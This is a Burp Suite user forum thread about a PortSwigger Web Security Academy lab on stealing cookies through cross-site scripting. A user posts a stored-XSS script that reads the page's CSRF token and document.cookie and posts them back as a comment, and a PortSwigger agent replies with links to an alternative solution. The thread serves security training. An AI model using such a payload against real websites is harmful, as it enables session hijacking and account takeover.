Burp Suite User Forum

Create new post

Exploiting cross-site scripting to steal cookies

Hibboxx | Last updated: Sep 14, 2023 11:45AM UTC

hello, i don't have burp pro so i craft a script but he don't not working, i think the challenge have a problem take my script : ``` <script> window.onload = function() { var data = “csrf=” + document.getElementsByTagName(“input”)[0].getAttribute(“value”) + “&postId=5&comment=” + document.cookie + “&name=hacker&email=test@gmail.com&website” fetch('https://0a7300830370c85a8048da3100490043.web-security-academy.net/post/comment', { method: 'POST', mode: 'no-cors', body:(data) }); }; </script> ```

Dominyque, PortSwigger Agent | Last updated: Sep 14, 2023 01:36PM UTC

Hi Did you follow the alternative solution that links to this lab?: https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf Additionally, you can have a look at this video, as it seems to attempt the lab without the Collaborator: https://www.youtube.com/watch?v=N_87S9XVy0w

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.